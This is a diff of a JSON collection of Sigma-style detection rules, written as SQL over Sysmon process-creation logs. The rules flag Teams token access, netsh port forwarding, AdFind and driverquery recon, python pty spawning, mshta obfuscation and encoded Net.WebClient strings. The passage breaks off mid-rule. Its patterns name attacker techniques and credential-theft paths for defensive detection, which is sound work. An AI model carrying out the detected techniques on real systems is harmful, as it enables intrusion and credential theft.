"Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "New Port Forwarding Rule Added Via Netsh.EXX", - "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", - "status": "test", - "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "status": "experimental", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.discovery" ], "falsepositives": [ - "Legitimate administration activity", - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_port_forwarding.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "status": "experimental", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", - "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "status": "experimental", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Microsoft Workflow Compiler Execution", - "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", - "status": "test", - "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", - "author": "Nik Seetharaman, frack113", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1127", - "attack.t1218" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate MWC use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_workflow_compiler.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "Potential System Information Discovery Via Wmic.EXE", - "id": "9d5a1274-922a-49d0-87f3-8c653483b909", + "title": "PUA - Advanced IP Scanner Execution", + "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "status": "experimental", - "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", - "author": "TropChaud", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", "tags": [ "attack.discovery", - "attack.t1082" + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" + "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" }, { - "title": "Share And Session Enumeration Using Net.EXE", - "id": "62510e69-616b-4078-b371-847da438cc03", - "status": "stable", - "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", - "author": "Endgame, JHasenbusch (ported for oscd.community)", + "title": "SQL Client Tools PowerShell Session Detection", + "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.communitly", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ], + "falsepositives": [ + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + }, + { + "title": "Use of VSIISExeLauncher.exe", + "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "status": "experimental", + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate use of net.exe utility by legitimate user" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '%view%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_share_and_sessions_enum.yml" + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", - "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", - "tags": [ - "attack.collection", - "attack.t1560.001" - ], + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "status": "experimental", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", - "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", + "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "status": "test", + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.t1218", + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "The process spawned by vsjitdebugger.exe is uncommon." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" }, { - "title": "Detected Windows Software Discovery", - "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "title": "Audio Capture via SoundRecorder", + "id": "83865853-59aa-449e-9600-74b9d89a6d6e", "status": "test", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "description": "Detect attacker collecting audio via SoundRecorder application.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate audio capture by legitimate user." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_software_discovery.yml" + "filename": "proc_creation_win_soundrecorder_audio_capture.yml" }, { - "title": "Arbitrary Binary Execution Using GUP Utility", - "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", - "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Imports Registry Key From a File", + "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "status": "test", + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.execution" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Other parent binaries using GUP not currently identified" + "Legitimate import of keys", + "Evernote" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\gup.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" ], - "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" + "filename": "proc_creation_win_regedit_import_keys.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "status": "experimental", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1059.001" + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", - "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", - "author": "frack113", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE 